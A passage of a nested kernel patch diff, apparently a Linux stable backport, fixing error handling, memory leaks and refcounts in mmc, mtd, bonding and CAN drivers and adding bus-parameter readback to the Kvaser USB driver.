+ static void sdhci_reset_for_reason(struct sdhci_host *host, enum sdhci_reset_reason reason)
+ {
++	if (host->quirks2 & SDHCI_QUIRK2_ISSUE_CMD_DAT_RESET_TOGETHER) {
++		sdhci_do_reset(host, SDHCI_RESET_CMD | SDHCI_RESET_DATA);
++		return;
++	}
++
+ 	switch (reason) {
+ 	case SDHCI_RESET_FOR_INIT:
+ 		sdhci_do_reset(host, SDHCI_RESET_CMD | SDHCI_RESET_DATA);
+diff --git a/drivers/mmc/host/sdhci.h b/drivers/mmc/host/sdhci.h
+index 87a3aaa074387..5ce7cdcc192fd 100644
+--- a/drivers/mmc/host/sdhci.h
++++ b/drivers/mmc/host/sdhci.h
+@@ -478,6 +478,8 @@ struct sdhci_host {
+  * block count.
+  */
+ #define SDHCI_QUIRK2_USE_32BIT_BLK_CNT			(1<<18)
++/* Issue CMD and DATA reset together */
++#define SDHCI_QUIRK2_ISSUE_CMD_DAT_RESET_TOGETHER	(1<<19)
+ 
+ 	int irq;		/* Device IRQ */
+ 	void __iomem *ioaddr;	/* Mapped address */
+diff --git a/drivers/mmc/host/sdhci_f_sdh30.c b/drivers/mmc/host/sdhci_f_sdh30.c
+index 3f5977979cf25..6c4f43e112826 100644
+--- a/drivers/mmc/host/sdhci_f_sdh30.c
++++ b/drivers/mmc/host/sdhci_f_sdh30.c
+@@ -168,6 +168,9 @@ static int sdhci_f_sdh30_probe(struct platform_device *pdev)
+ 	if (reg & SDHCI_CAN_DO_8BIT)
+ 		priv->vendor_hs200 = F_SDH30_EMMC_HS200;
+ 
++	if (!(reg & SDHCI_TIMEOUT_CLK_MASK))
++		host->quirks |= SDHCI_QUIRK_DATA_TIMEOUT_USES_SDCLK;
++
+ 	ret = sdhci_add_host(host);
+ 	if (ret)
+ 		goto err_add_host;
+diff --git a/drivers/mmc/host/toshsd.c b/drivers/mmc/host/toshsd.c
+index 8d037c2071abc..497791ffada6d 100644
+--- a/drivers/mmc/host/toshsd.c
++++ b/drivers/mmc/host/toshsd.c
+@@ -651,7 +651,9 @@ static int toshsd_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	if (ret)
+ 		goto unmap;
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto free_irq;
+ 
+ 	base = pci_resource_start(pdev, 0);
+ 	dev_dbg(&pdev->dev, "MMIO %pa, IRQ %d\n", &base, pdev->irq);
+@@ -660,6 +662,8 @@ static int toshsd_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	return 0;
+ 
++free_irq:
++	free_irq(pdev->irq, host);
+ unmap:
+ 	pci_iounmap(pdev, host->ioaddr);
+ release:
+diff --git a/drivers/mmc/host/via-sdmmc.c b/drivers/mmc/host/via-sdmmc.c
+index 88662a90ed960..a2b0d9461665b 100644
+--- a/drivers/mmc/host/via-sdmmc.c
++++ b/drivers/mmc/host/via-sdmmc.c
+@@ -1151,7 +1151,9 @@ static int via_sd_probe(struct pci_dev *pcidev,
+ 	    pcidev->subsystem_device == 0x3891)
+ 		sdhost->quirks = VIA_CRDR_QUIRK_300MS_PWRDELAY;
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto unmap;
+ 
+ 	return 0;
+ 
+diff --git a/drivers/mmc/host/vub300.c b/drivers/mmc/host/vub300.c
+index 97beece62fec4..ab36ec4797478 100644
+--- a/drivers/mmc/host/vub300.c
++++ b/drivers/mmc/host/vub300.c
+@@ -2299,14 +2299,14 @@ static int vub300_probe(struct usb_interface *interface,
+ 				0x0000, 0x0000, &vub300->system_port_status,
+ 				sizeof(vub300->system_port_status), 1000);
+ 	if (retval < 0) {
+-		goto error4;
++		goto error5;
+ 	} else if (sizeof(vub300->system_port_status) == retval) {
+ 		vub300->card_present =
+ 			(0x0001 & vub300->system_port_status.port_flags) ? 1 : 0;
+ 		vub300->read_only =
+ 			(0x0010 & vub300->system_port_status.port_flags) ? 1 : 0;
+ 	} else {
+-		goto error4;
++		goto error5;
+ 	}
+ 	usb_set_intfdata(interface, vub300);
+ 	INIT_DELAYED_WORK(&vub300->pollwork, vub300_pollwork_thread);
+@@ -2329,8 +2329,13 @@ static int vub300_probe(struct usb_interface *interface,
+ 			 "USB vub300 remote SDIO host controller[%d]"
+ 			 "connected with no SD/SDIO card inserted\n",
+ 			 interface_to_InterfaceNumber(interface));
+-	mmc_add_host(mmc);
++	retval = mmc_add_host(mmc);
++	if (retval)
++		goto error6;
++
+ 	return 0;
++error6:
++	del_timer_sync(&vub300->inactivity_timer);
+ error5:
+ 	mmc_free_host(mmc);
+ 	/*
+diff --git a/drivers/mmc/host/wbsd.c b/drivers/mmc/host/wbsd.c
+index 67ecd342fe5f1..7c7ec8d10232b 100644
+--- a/drivers/mmc/host/wbsd.c
++++ b/drivers/mmc/host/wbsd.c
+@@ -1698,7 +1698,17 @@ static int wbsd_init(struct device *dev, int base, int irq, int dma,
+ 	 */
+ 	wbsd_init_device(host);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret) {
++		if (!pnp)
++			wbsd_chip_poweroff(host);
++
++		wbsd_release_resources(host);
++		wbsd_free_mmc(dev);
++
++		mmc_free_host(mmc);
++		return ret;
++	}
+ 
+ 	pr_info("%s: W83L51xD", mmc_hostname(mmc));
+ 	if (host->chip_id != 0)
+diff --git a/drivers/mmc/host/wmt-sdmmc.c b/drivers/mmc/host/wmt-sdmmc.c
+index 9b5c503e3a3fc..9aa3027ca25e4 100644
+--- a/drivers/mmc/host/wmt-sdmmc.c
++++ b/drivers/mmc/host/wmt-sdmmc.c
+@@ -856,11 +856,15 @@ static int wmt_mci_probe(struct platform_device *pdev)
+ 	/* configure the controller to a known 'ready' state */
+ 	wmt_reset_hardware(mmc);
+ 
+-	mmc_add_host(mmc);
++	ret = mmc_add_host(mmc);
++	if (ret)
++		goto fail7;
+ 
+ 	dev_info(&pdev->dev, "WMT SDHC Controller initialized\n");
+ 
+ 	return 0;
++fail7:
++	clk_disable_unprepare(priv->clk_sdmmc);
+ fail6:
+ 	clk_put(priv->clk_sdmmc);
+ fail5_and_a_half:
+diff --git a/drivers/mtd/lpddr/lpddr2_nvm.c b/drivers/mtd/lpddr/lpddr2_nvm.c
+index 367e2d906de02..e71af4c490969 100644
+--- a/drivers/mtd/lpddr/lpddr2_nvm.c
++++ b/drivers/mtd/lpddr/lpddr2_nvm.c
+@@ -433,6 +433,8 @@ static int lpddr2_nvm_probe(struct platform_device *pdev)
+ 
+ 	/* lpddr2_nvm address range */
+ 	add_range = platform_get_resource(pdev, IORESOURCE_MEM, 0);
++	if (!add_range)
++		return -ENODEV;
+ 
+ 	/* Populate map_info data structure */
+ 	*map = (struct map_info) {
+diff --git a/drivers/mtd/maps/pxa2xx-flash.c b/drivers/mtd/maps/pxa2xx-flash.c
+index 1749dbbacc135..62a5bf41a6d72 100644
+--- a/drivers/mtd/maps/pxa2xx-flash.c
++++ b/drivers/mtd/maps/pxa2xx-flash.c
+@@ -64,6 +64,7 @@ static int pxa2xx_flash_probe(struct platform_device *pdev)
+ 	if (!info->map.virt) {
+ 		printk(KERN_WARNING "Failed to ioremap %s\n",
+ 		       info->map.name);
++		kfree(info);
+ 		return -ENOMEM;
+ 	}
+ 	info->map.cached = ioremap_cache(info->map.phys, info->map.size);
+@@ -85,6 +86,7 @@ static int pxa2xx_flash_probe(struct platform_device *pdev)
+ 		iounmap((void *)info->map.virt);
+ 		if (info->map.cached)
+ 			iounmap(info->map.cached);
++		kfree(info);
+ 		return -EIO;
+ 	}
+ 	info->mtd->dev.parent = &pdev->dev;
+diff --git a/drivers/mtd/mtdcore.c b/drivers/mtd/mtdcore.c
+index 0b4ca0aa41321..686ada1a63e9a 100644
+--- a/drivers/mtd/mtdcore.c
++++ b/drivers/mtd/mtdcore.c
+@@ -723,8 +723,10 @@ int add_mtd_device(struct mtd_info *mtd)
+ 	mtd_check_of_node(mtd);
+ 	of_node_get(mtd_get_of_node(mtd));
+ 	error = device_register(&mtd->dev);
+-	if (error)
++	if (error) {
++		put_device(&mtd->dev);
+ 		goto fail_added;
++	}
+ 
+ 	/* Add the nvmem provider */
+ 	error = mtd_nvmem_add(mtd);
+@@ -774,6 +776,7 @@ int del_mtd_device(struct mtd_info *mtd)
+ {
+ 	int ret;
+ 	struct mtd_notifier *not;
++	struct device_node *mtd_of_node;
+ 
+ 	mutex_lock(&mtd_table_mutex);
+ 
+@@ -792,6 +795,7 @@ int del_mtd_device(struct mtd_info *mtd)
+ 		       mtd->index, mtd->name, mtd->usecount);
+ 		ret = -EBUSY;
+ 	} else {
++		mtd_of_node = mtd_get_of_node(mtd);
+ 		debugfs_remove_recursive(mtd->dbg.dfs_dir);
+ 
+ 		/* Try to remove the NVMEM provider */
+@@ -803,7 +807,7 @@ int del_mtd_device(struct mtd_info *mtd)
+ 		memset(&mtd->dev, 0, sizeof(mtd->dev));
+ 
+ 		idr_remove(&mtd_idr, mtd->index);
+-		of_node_put(mtd_get_of_node(mtd));
++		of_node_put(mtd_of_node);
+ 
+ 		module_put(THIS_MODULE);
+ 		ret = 0;
+@@ -2483,6 +2487,7 @@ static int __init init_mtd(void)
+ out_procfs:
+ 	if (proc_mtd)
+ 		remove_proc_entry("mtd", NULL);
++	bdi_unregister(mtd_bdi);
+ 	bdi_put(mtd_bdi);
+ err_bdi:
+ 	class_unregister(&mtd_class);
+diff --git a/drivers/mtd/spi-nor/core.c b/drivers/mtd/spi-nor/core.c
+index bee8fc4c9f078..0cf1a1797ea32 100644
+--- a/drivers/mtd/spi-nor/core.c
++++ b/drivers/mtd/spi-nor/core.c
+@@ -1914,7 +1914,8 @@ static int spi_nor_spimem_check_readop(struct spi_nor *nor,
+ 	spi_nor_spimem_setup_op(nor, &op, read->proto);
+ 
+ 	/* convert the dummy cycles to the number of bytes */
+-	op.dummy.nbytes = (nor->read_dummy * op.dummy.buswidth) / 8;
++	op.dummy.nbytes = (read->num_mode_clocks + read->num_wait_states) *
++			  op.dummy.buswidth / 8;
+ 	if (spi_nor_protocol_is_dtr(nor->read_proto))
+ 		op.dummy.nbytes *= 2;
+ 
+diff --git a/drivers/mtd/spi-nor/sysfs.c b/drivers/mtd/spi-nor/sysfs.c
+index 9aec9d8a98ada..4c3b351aef245 100644
+--- a/drivers/mtd/spi-nor/sysfs.c
++++ b/drivers/mtd/spi-nor/sysfs.c
+@@ -67,6 +67,19 @@ static struct bin_attribute *spi_nor_sysfs_bin_entries[] = {
+ 	NULL
+ };
+ 
++static umode_t spi_nor_sysfs_is_visible(struct kobject *kobj,
++					struct attribute *attr, int n)
++{
++	struct spi_device *spi = to_spi_device(kobj_to_dev(kobj));
++	struct spi_mem *spimem = spi_get_drvdata(spi);
++	struct spi_nor *nor = spi_mem_get_drvdata(spimem);
++
++	if (attr == &dev_attr_jedec_id.attr && !nor->info->id_len)
++		return 0;
++
++	return 0444;
++}
++
+ static umode_t spi_nor_sysfs_is_bin_visible(struct kobject *kobj,
+ 					    struct bin_attribute *attr, int n)
+ {
+@@ -82,6 +95,7 @@ static umode_t spi_nor_sysfs_is_bin_visible(struct kobject *kobj,
+ 
+ static const struct attribute_group spi_nor_sysfs_group = {
+ 	.name		= "spi-nor",
++	.is_visible	= spi_nor_sysfs_is_visible,
+ 	.is_bin_visible	= spi_nor_sysfs_is_bin_visible,
+ 	.attrs		= spi_nor_sysfs_entries,
+ 	.bin_attrs	= spi_nor_sysfs_bin_entries,
+diff --git a/drivers/net/bonding/bond_main.c b/drivers/net/bonding/bond_main.c
+index b9a882f182d29..b108f2f4adc20 100644
+--- a/drivers/net/bonding/bond_main.c
++++ b/drivers/net/bonding/bond_main.c
+@@ -2531,12 +2531,21 @@ static int bond_slave_info_query(struct net_device *bond_dev, struct ifslave *in
+ /* called with rcu_read_lock() */
+ static int bond_miimon_inspect(struct bonding *bond)
+ {
++	bool ignore_updelay = false;
+ 	int link_state, commit = 0;
+ 	struct list_head *iter;
+ 	struct slave *slave;
+-	bool ignore_updelay;
+ 
+-	ignore_updelay = !rcu_dereference(bond->curr_active_slave);
++	if (BOND_MODE(bond) == BOND_MODE_ACTIVEBACKUP) {
++		ignore_updelay = !rcu_dereference(bond->curr_active_slave);
++	} else {
++		struct bond_up_slave *usable_slaves;
++
++		usable_slaves = rcu_dereference(bond->usable_slaves);
++
++		if (usable_slaves && usable_slaves->count == 0)
++			ignore_updelay = true;
++	}
+ 
+ 	bond_for_each_slave_rcu(bond, slave, iter) {
+ 		bond_propose_link_state(slave, BOND_LINK_NOCHANGE);
+@@ -2644,8 +2653,9 @@ static void bond_miimon_link_change(struct bonding *bond,
+ 
+ static void bond_miimon_commit(struct bonding *bond)
+ {
+-	struct list_head *iter;
+ 	struct slave *slave, *primary;
++	bool do_failover = false;
++	struct list_head *iter;
+ 
+ 	bond_for_each_slave(bond, slave, iter) {
+ 		switch (slave->link_new_state) {
+@@ -2689,8 +2699,9 @@ static void bond_miimon_commit(struct bonding *bond)
+ 
+ 			bond_miimon_link_change(bond, slave, BOND_LINK_UP);
+ 
+-			if (!bond->curr_active_slave || slave == primary)
+-				goto do_failover;
++			if (!rcu_access_pointer(bond->curr_active_slave) || slave == primary ||
++			    slave->prio > rcu_dereference(bond->curr_active_slave)->prio)
++				do_failover = true;
+ 
+ 			continue;
+ 
+@@ -2711,7 +2722,7 @@ static void bond_miimon_commit(struct bonding *bond)
+ 			bond_miimon_link_change(bond, slave, BOND_LINK_DOWN);
+ 
+ 			if (slave == rcu_access_pointer(bond->curr_active_slave))
+-				goto do_failover;
++				do_failover = true;
+ 
+ 			continue;
+ 
+@@ -2722,8 +2733,9 @@ static void bond_miimon_commit(struct bonding *bond)
+ 
+ 			continue;
+ 		}
++	}
+ 
+-do_failover:
++	if (do_failover) {
+ 		block_netpoll_tx();
+ 		bond_select_active_slave(bond);
+ 		unblock_netpoll_tx();
+@@ -3521,6 +3533,7 @@ static int bond_ab_arp_inspect(struct bonding *bond)
+  */
+ static void bond_ab_arp_commit(struct bonding *bond)
+ {
++	bool do_failover = false;
+ 	struct list_head *iter;
+ 	unsigned long last_tx;
+ 	struct slave *slave;
+@@ -3550,8 +3563,9 @@ static void bond_ab_arp_commit(struct bonding *bond)
+ 				slave_info(bond->dev, slave->dev, "link status definitely up\n");
+ 
+ 				if (!rtnl_dereference(bond->curr_active_slave) ||
+-				    slave == rtnl_dereference(bond->primary_slave))
+-					goto do_failover;
++				    slave == rtnl_dereference(bond->primary_slave) ||
++				    slave->prio > rtnl_dereference(bond->curr_active_slave)->prio)
++					do_failover = true;
+ 
+ 			}
+ 
+@@ -3570,7 +3584,7 @@ static void bond_ab_arp_commit(struct bonding *bond)
+ 
+ 			if (slave == rtnl_dereference(bond->curr_active_slave)) {
+ 				RCU_INIT_POINTER(bond->current_arp_slave, NULL);
+-				goto do_failover;
++				do_failover = true;
+ 			}
+ 
+ 			continue;
+@@ -3594,8 +3608,9 @@ static void bond_ab_arp_commit(struct bonding *bond)
+ 				  slave->link_new_state);
+ 			continue;
+ 		}
++	}
+ 
+-do_failover:
++	if (do_failover) {
+ 		block_netpoll_tx();
+ 		bond_select_active_slave(bond);
+ 		unblock_netpoll_tx();
+diff --git a/drivers/net/can/m_can/m_can.c b/drivers/net/can/m_can/m_can.c
+index e5575d2755e4b..2de998b98cb5e 100644
+--- a/drivers/net/can/m_can/m_can.c
++++ b/drivers/net/can/m_can/m_can.c
+@@ -1233,10 +1233,17 @@ static int m_can_set_bittiming(struct net_device *dev)
+  * - setup bittiming
+  * - configure timestamp generation
+  */
+-static void m_can_chip_config(struct net_device *dev)
++static int m_can_chip_config(struct net_device *dev)
+ {
+ 	struct m_can_classdev *cdev = netdev_priv(dev);
+ 	u32 cccr, test;
++	int err;
++
++	err = m_can_init_ram(cdev);
++	if (err) {
++		dev_err(cdev->dev, "Message RAM configuration failed\n");
++		return err;
++	}
+ 
+ 	m_can_config_endisable(cdev, true);
+ 
+@@ -1360,18 +1367,25 @@ static void m_can_chip_config(struct net_device *dev)
+ 
+ 	if (cdev->ops->init)
+ 		cdev->ops->init(cdev);
++
++	return 0;
+ }
+ 
+-static void m_can_start(struct net_device *dev)
++static int m_can_start(struct net_device *dev)
+ {
+ 	struct m_can_classdev *cdev = netdev_priv(dev);
++	int ret;
+ 
+ 	/* basic m_can configuration */
+-	m_can_chip_config(dev);
++	ret = m_can_chip_config(dev);
++	if (ret)
++		return ret;
+ 
+ 	cdev->can.state = CAN_STATE_ERROR_ACTIVE;
+ 
+ 	m_can_enable_all_interrupts(cdev);
++
++	return 0;
+ }
+ 
+ static int m_can_set_mode(struct net_device *dev, enum can_mode mode)
+@@ -1799,7 +1813,9 @@ static int m_can_open(struct net_device *dev)
+ 	}
+ 
+ 	/* start the m_can controller */
+-	m_can_start(dev);
++	err = m_can_start(dev);
++	if (err)
++		goto exit_irq_fail;
+ 
+ 	if (!cdev->is_peripheral)
+ 		napi_enable(&cdev->napi);
+@@ -2058,9 +2074,13 @@ int m_can_class_resume(struct device *dev)
+ 		ret = m_can_clk_start(cdev);
+ 		if (ret)
+ 			return ret;
++		ret  = m_can_start(ndev);
++		if (ret) {
++			m_can_clk_stop(cdev);
++
++			return ret;
++		}
+ 
+-		m_can_init_ram(cdev);
+-		m_can_start(ndev);
+ 		netif_device_attach(ndev);
+ 		netif_start_queue(ndev);
+ 	}
+diff --git a/drivers/net/can/m_can/m_can_platform.c b/drivers/net/can/m_can/m_can_platform.c
+index eee47bad05920..de6d8e01bf2e8 100644
+--- a/drivers/net/can/m_can/m_can_platform.c
++++ b/drivers/net/can/m_can/m_can_platform.c
+@@ -140,10 +140,6 @@ static int m_can_plat_probe(struct platform_device *pdev)
+ 
+ 	platform_set_drvdata(pdev, mcan_class);
+ 
+-	ret = m_can_init_ram(mcan_class);
+-	if (ret)
+-		goto probe_fail;
+-
+ 	pm_runtime_enable(mcan_class->dev);
+ 	ret = m_can_class_register(mcan_class);
+ 	if (ret)
+diff --git a/drivers/net/can/m_can/tcan4x5x-core.c b/drivers/net/can/m_can/tcan4x5x-core.c
+index 41645a24384ce..2342aa011647c 100644
+--- a/drivers/net/can/m_can/tcan4x5x-core.c
++++ b/drivers/net/can/m_can/tcan4x5x-core.c
+@@ -10,7 +10,7 @@
+ #define TCAN4X5X_DEV_ID1 0x04
+ #define TCAN4X5X_REV 0x08
+ #define TCAN4X5X_STATUS 0x0C
+-#define TCAN4X5X_ERROR_STATUS 0x10
++#define TCAN4X5X_ERROR_STATUS_MASK 0x10
+ #define TCAN4X5X_CONTROL 0x14
+ 
+ #define TCAN4X5X_CONFIG 0x800
+@@ -204,17 +204,7 @@ static int tcan4x5x_clear_interrupts(struct m_can_classdev *cdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_MCAN_INT_REG,
+-				      TCAN4X5X_ENABLE_MCAN_INT);
+-	if (ret)
+-		return ret;
+-
+-	ret = tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_INT_FLAGS,
+-				      TCAN4X5X_CLEAR_ALL_INT);
+-	if (ret)
+-		return ret;
+-
+-	return tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_ERROR_STATUS,
++	return tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_INT_FLAGS,
+ 				       TCAN4X5X_CLEAR_ALL_INT);
+ }
+ 
+@@ -234,8 +224,8 @@ static int tcan4x5x_init(struct m_can_classdev *cdev)
+ 	if (ret)
+ 		return ret;
+ 
+-	/* Zero out the MCAN buffers */
+-	ret = m_can_init_ram(cdev);
++	ret = tcan4x5x_write_tcan_reg(cdev, TCAN4X5X_ERROR_STATUS_MASK,
++				      TCAN4X5X_CLEAR_ALL_INT);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb.h b/drivers/net/can/usb/kvaser_usb/kvaser_usb.h
+index f6c0938027ece..ff10b3790d844 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb.h
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb.h
+@@ -76,6 +76,14 @@ struct kvaser_usb_tx_urb_context {
+ 	u32 echo_index;
+ };
+ 
++struct kvaser_usb_busparams {
++	__le32 bitrate;
++	u8 tseg1;
++	u8 tseg2;
++	u8 sjw;
++	u8 nsamples;
++} __packed;
++
+ struct kvaser_usb {
+ 	struct usb_device *udev;
+ 	struct usb_interface *intf;
+@@ -104,13 +112,19 @@ struct kvaser_usb_net_priv {
+ 	struct can_priv can;
+ 	struct can_berr_counter bec;
+ 
++	/* subdriver-specific data */
++	void *sub_priv;
++
+ 	struct kvaser_usb *dev;
+ 	struct net_device *netdev;
+ 	int channel;
+ 
+-	struct completion start_comp, stop_comp, flush_comp;
++	struct completion start_comp, stop_comp, flush_comp,
++			  get_busparams_comp;
+ 	struct usb_anchor tx_submitted;
+ 
++	struct kvaser_usb_busparams busparams_nominal, busparams_data;
++
+ 	spinlock_t tx_contexts_lock; /* lock for active_tx_contexts */
+ 	int active_tx_contexts;
+ 	struct kvaser_usb_tx_urb_context tx_contexts[];
+@@ -120,11 +134,15 @@ struct kvaser_usb_net_priv {
+  * struct kvaser_usb_dev_ops - Device specific functions
+  * @dev_set_mode:		used for can.do_set_mode
+  * @dev_set_bittiming:		used for can.do_set_bittiming
++ * @dev_get_busparams:		readback arbitration busparams
+  * @dev_set_data_bittiming:	used for can.do_set_data_bittiming
++ * @dev_get_data_busparams:	readback data busparams
+  * @dev_get_berr_counter:	used for can.do_get_berr_counter
+  *
+  * @dev_setup_endpoints:	setup USB in and out endpoints
+  * @dev_init_card:		initialize card
++ * @dev_init_channel:		initialize channel
++ * @dev_remove_channel:		uninitialize channel
+  * @dev_get_software_info:	get software info
+  * @dev_get_software_details:	get software details
+  * @dev_get_card_info:		get card info
+@@ -140,12 +158,18 @@ struct kvaser_usb_net_priv {
+  */
+ struct kvaser_usb_dev_ops {
+ 	int (*dev_set_mode)(struct net_device *netdev, enum can_mode mode);
+-	int (*dev_set_bittiming)(struct net_device *netdev);
+-	int (*dev_set_data_bittiming)(struct net_device *netdev);
++	int (*dev_set_bittiming)(const struct net_device *netdev,
++				 const struct kvaser_usb_busparams *busparams);
++	int (*dev_get_busparams)(struct kvaser_usb_net_priv *priv);
++	int (*dev_set_data_bittiming)(const struct net_device *netdev,
++				      const struct kvaser_usb_busparams *busparams);
++	int (*dev_get_data_busparams)(struct kvaser_usb_net_priv *priv);
+ 	int (*dev_get_berr_counter)(const struct net_device *netdev,
+ 				    struct can_berr_counter *bec);
+ 	int (*dev_setup_endpoints)(struct kvaser_usb *dev);
+ 	int (*dev_init_card)(struct kvaser_usb *dev);
++	int (*dev_init_channel)(struct kvaser_usb_net_priv *priv);
++	void (*dev_remove_channel)(struct kvaser_usb_net_priv *priv);
+ 	int (*dev_get_software_info)(struct kvaser_usb *dev);
+ 	int (*dev_get_software_details)(struct kvaser_usb *dev);
+ 	int (*dev_get_card_info)(struct kvaser_usb *dev);
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+index 802e27c0ecedb..3a2bfaad14065 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_core.c
+@@ -440,10 +440,6 @@ static int kvaser_usb_open(struct net_device *netdev)
+ 	if (err)
+ 		return err;
+ 
+-	err = kvaser_usb_setup_rx_urbs(dev);
+-	if (err)
+-		goto error;
+-
+ 	err = ops->dev_set_opt_mode(priv);
+ 	if (err)
+ 		goto error;
+@@ -534,6 +530,93 @@ static int kvaser_usb_close(struct net_device *netdev)
+ 	return 0;
+ }
+ 
++static int kvaser_usb_set_bittiming(struct net_device *netdev)
++{
++	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
++	struct kvaser_usb *dev = priv->dev;
++	const struct kvaser_usb_dev_ops *ops = dev->driver_info->ops;
++	struct can_bittiming *bt = &priv->can.bittiming;
++
++	struct kvaser_usb_busparams busparams;
++	int tseg1 = bt->prop_seg + bt->phase_seg1;
++	int tseg2 = bt->phase_seg2;
++	int sjw = bt->sjw;
++	int err = -EOPNOTSUPP;
++
++	busparams.bitrate = cpu_to_le32(bt->bitrate);
++	busparams.sjw = (u8)sjw;
++	busparams.tseg1 = (u8)tseg1;
++	busparams.tseg2 = (u8)tseg2;
++	if (priv->can.ctrlmode & CAN_CTRLMODE_3_SAMPLES)
++		busparams.nsamples = 3;
++	else
++		busparams.nsamples = 1;
++
++	err = ops->dev_set_bittiming(netdev, &busparams);
++	if (err)
++		return err;
++
++	err = kvaser_usb_setup_rx_urbs(priv->dev);
++	if (err)
++		return err;
++
++	err = ops->dev_get_busparams(priv);
++	if (err) {
++		/* Treat EOPNOTSUPP as success */
++		if (err == -EOPNOTSUPP)
++			err = 0;
++		return err;
++	}
++
++	if (memcmp(&busparams, &priv->busparams_nominal,
++		   sizeof(priv->busparams_nominal)) != 0)
++		err = -EINVAL;
++
++	return err;
++}
++
++static int kvaser_usb_set_data_bittiming(struct net_device *netdev)
++{
++	struct kvaser_usb_net_priv *priv = netdev_priv(netdev);
++	struct kvaser_usb *dev = priv->dev;
++	const struct kvaser_usb_dev_ops *ops = dev->driver_info->ops;
++	struct can_bittiming *dbt = &priv->can.data_bittiming;
++
++	struct kvaser_usb_busparams busparams;
++	int tseg1 = dbt->prop_seg + dbt->phase_seg1;
++	int tseg2 = dbt->phase_seg2;
++	int sjw = dbt->sjw;
++	int err;
++
++	if (!ops->dev_set_data_bittiming ||
++	    !ops->dev_get_data_busparams)
++		return -EOPNOTSUPP;
++
++	busparams.bitrate = cpu_to_le32(dbt->bitrate);
++	busparams.sjw = (u8)sjw;
++	busparams.tseg1 = (u8)tseg1;
++	busparams.tseg2 = (u8)tseg2;
++	busparams.nsamples = 1;
++
++	err = ops->dev_set_data_bittiming(netdev, &busparams);
++	if (err)
++		return err;
++
++	err = kvaser_usb_setup_rx_urbs(priv->dev);
++	if (err)
++		return err;
++
++	err = ops->dev_get_data_busparams(priv);
++	if (err)
++		return err;
++
++	if (memcmp(&busparams, &priv->busparams_data,
++		   sizeof(priv->busparams_data)) != 0)
++		err = -EINVAL;
++
++	return err;
++}
++
+ static void kvaser_usb_write_bulk_callback(struct urb *urb)
+ {
+ 	struct kvaser_usb_tx_urb_context *context = urb->context;
+@@ -684,6 +767,7 @@ static const struct ethtool_ops kvaser_usb_ethtool_ops_hwts = {
+ 
+ static void kvaser_usb_remove_interfaces(struct kvaser_usb *dev)
+ {
++	const struct kvaser_usb_dev_ops *ops = dev->driver_info->ops;
+ 	int i;
+ 
+ 	for (i = 0; i < dev->nchannels; i++) {
+@@ -699,6 +783,9 @@ static void kvaser_usb_remove_interfaces(struct kvaser_usb *dev)
+ 		if (!dev->nets[i])
+ 			continue;
+ 
++		if (ops->dev_remove_channel)
++			ops->dev_remove_channel(dev->nets[i]);
++
+ 		free_candev(dev->nets[i]->netdev);
+ 	}
+ }
+@@ -730,6 +817,7 @@ static int kvaser_usb_init_one(struct kvaser_usb *dev, int channel)
+ 	init_completion(&priv->start_comp);
+ 	init_completion(&priv->stop_comp);
+ 	init_completion(&priv->flush_comp);
++	init_completion(&priv->get_busparams_comp);
+ 	priv->can.ctrlmode_supported = 0;
+ 
+ 	priv->dev = dev;
+@@ -742,7 +830,7 @@ static int kvaser_usb_init_one(struct kvaser_usb *dev, int channel)
+ 	priv->can.state = CAN_STATE_STOPPED;
+ 	priv->can.clock.freq = dev->cfg->clock.freq;
+ 	priv->can.bittiming_const = dev->cfg->bittiming_const;
+-	priv->can.do_set_bittiming = ops->dev_set_bittiming;
++	priv->can.do_set_bittiming = kvaser_usb_set_bittiming;
+ 	priv->can.do_set_mode = ops->dev_set_mode;
+ 	if ((driver_info->quirks & KVASER_USB_QUIRK_HAS_TXRX_ERRORS) ||
+ 	    (priv->dev->card_data.capabilities & KVASER_USB_CAP_BERR_CAP))
+@@ -754,7 +842,7 @@ static int kvaser_usb_init_one(struct kvaser_usb *dev, int channel)
+ 
+ 	if (priv->can.ctrlmode_supported & CAN_CTRLMODE_FD) {
+ 		priv->can.data_bittiming_const = dev->cfg->data_bittiming_const;
+-		priv->can.do_set_data_bittiming = ops->dev_set_data_bittiming;
++		priv->can.do_set_data_bittiming = kvaser_usb_set_data_bittiming;
+ 	}
+ 
+ 	netdev->flags |= IFF_ECHO;
+@@ -772,17 +860,26 @@ static int kvaser_usb_init_one(struct kvaser_usb *dev, int channel)
+ 
+ 	dev->nets[channel] = priv;
+ 
++	if (ops->dev_init_channel) {
++		err = ops->dev_init_channel(priv);
++		if (err)
++			goto err;
++	}
++
+ 	err = register_candev(netdev);
+ 	if (err) {
+ 		dev_err(&dev->intf->dev, "Failed to register CAN device\n");
+-		free_candev(netdev);
+-		dev->nets[channel] = NULL;
+-		return err;
++		goto err;
+ 	}
+ 
+ 	netdev_dbg(netdev, "device registered\n");
+ 
+ 	return 0;
++
++err:
++	free_candev(netdev);
++	dev->nets[channel] = NULL;
++	return err;
+ }
+ 
+ static int kvaser_usb_probe(struct usb_interface *intf,
+diff --git a/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c b/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
+index 66f672ea631b8..f688124d6d669 100644
+--- a/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
++++ b/drivers/net/can/usb/kvaser_usb/kvaser_usb_hydra.c
+@@ -45,6 +45,8 @@ static const struct kvaser_usb_dev_cfg kvaser_usb_hydra_dev_cfg_rt;
+ 
